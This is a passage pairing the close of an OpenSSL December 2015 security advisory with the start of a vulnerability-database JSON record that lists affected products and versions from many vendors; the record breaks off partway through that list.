This issue was reported to OpenSSL on August 3 2015 by Guy Leaver (Cisco). The fix was developed by Matt Caswell of the OpenSSL development team.
Note
As per our previous announcements and our Release Strategy (https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions 1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these versions will be provided after that date. In the absence of significant security issues being identified prior to that date, the 1.0.0t and 0.9.8zh releases will be the last for those versions. Users of these versions are advised to upgrade.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20151203.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/about/secpolicy.html
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201512-0483", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "15.1" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "8.3" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "8.4" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "15.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "4.0.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "15.04" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "15.10" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2a" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "5.0.0" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "4.2.3" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "0.10.41" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2c" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "5.1.1" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "0.12.9" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2b" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.04" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "0.12.0" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "0.10.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "hpe systems insight manager", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "mysql", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.7.10 and earlier" }, { "model": "hpe server migration pack", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1" }, { "model": "mysql", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.6.28 and earlier" }, { "model": "hpe insight control", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "none" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.1q" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "4.63" }, { "model": "hpe version control repository manager", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "hpe matrix operating environment", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.2e" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "5.2" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.2" }, { "model": "system management homepage", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "secure global desktop", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "4.71" }, { "model": "hpe insight control", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "server provisioning" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.5.0.6" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.14" }, { "model": "10.2-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network controller 1.0.3361m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.10" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.19" }, { "model": "1/10gb uplink ethernet switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.8.22.0" }, { "model": "(comware r2432p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "59307)" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.10" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.6" }, { "model": "fortimanager", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.4" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.18" }, { "model": "oncommand performance manager", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.12.0" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "hsr6602 (comware r3303p28", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "ru r3303p28.ru", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "66025" }, { "model": "system networking rackswitch g8264", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.15.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.15" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "fortiauthenticator", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "1.5" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "fortimanager", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.6" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.13" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "qradar incident forensics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.5" }, { "model": "9.3-release-p31", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "hp870 (comware r2607p51", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.0.0" }, { "model": "systems insight manager 7.3.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "msr (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "30-165)" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.5.0.2" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4.19" }, { "model": "insight control server provisioning", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3361" }, { "model": "10.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0" }, { "model": "4500g (comware r2221p22", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.5.0.6" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "fortiswitch", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "mobile foundation consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.1" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3394" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.4.0.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.3" }, { "model": "9.3-release-p22", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.7" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.6.0.3" }, { "model": "openscape uc application", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "0" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.4" }, { "model": "msr (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "30-1x5)" }, { "model": "fortiadc", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3.2.1" }, { "model": "(comware r2150", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "79007)" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37001.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "5.0" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "9.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "qradar siem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.4" }, { "model": "opensuse evergreen", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.4" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.5" }, { "model": "mq light client module for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2014091001" }, { "model": "flashsystem 9843-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.8" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "g8264cs si fabric image", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.12.0" }, { "model": "bigfix platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "smb (comware r1110", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "16205)" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "10.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "2.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2" }, { "model": "flex system fabric cn4093 10gb converged scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.12.0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.4" }, { "model": "flashsystem 9848-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "system networking rackswitch g8264cs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.12.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50001.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.16" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.5" }, { "model": "qradar siem patch ifix01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.44" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.2" }, { "model": "qradar siem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "10.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.4" }, { "model": "system networking rackswitch g8124", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.16.0" }, { "model": "mobile foundation enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "initiate master data service patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.210" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.9" }, { "model": "fortimail", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "forticlient", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.3.091" }, { "model": "msr20 (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.8" }, { "model": "msr 50-g2 (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3.0.10" }, { "model": "infosphere master data management patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "ctpview 7.3r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "9.3-beta3-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.0" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.15" }, { "model": "system networking rackswitch g8052", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.11.6.0" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70007.6.0.4" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.5" }, { "model": "mq light client module for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2014090800" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.3" }, { "model": "system networking rackswitch g8124-e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11.5.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "10.2-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.19" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.6" }, { "model": "si (comware r1517", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "51205)" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "10.1-rc2-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "(comware r7180", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "105007)" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3" }, { "model": "project openssl 1.0.2e", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "bigfix platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "rational clearquest", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.16" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.2" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "project openssl 1.0.1q", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "qlogic 8gb intelligent pass-thru module \u0026 san switch module for", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.10.1.38.00" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "icewall sso agent option", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.3" }, { "model": "openscape common management port", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "0" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "security network controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "1/10gb uplink ethernet switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.4.13.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.3" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.1" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "netezza platform software 7.2.0.4-p2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3.0.10" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4.1.8" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "(comware r7180", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "75007)" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.1.8" }, { "model": "system networking rackswitch g8316", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.15.0" }, { "model": "oncommand report", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.213" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.12" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.4" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.17" }, { "model": "qlogic 8gb intelligent pass-thru module \u0026 san switch module for", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.10" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.4.0.7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.13" }, { "model": "cognos insight", "scope": "eq", 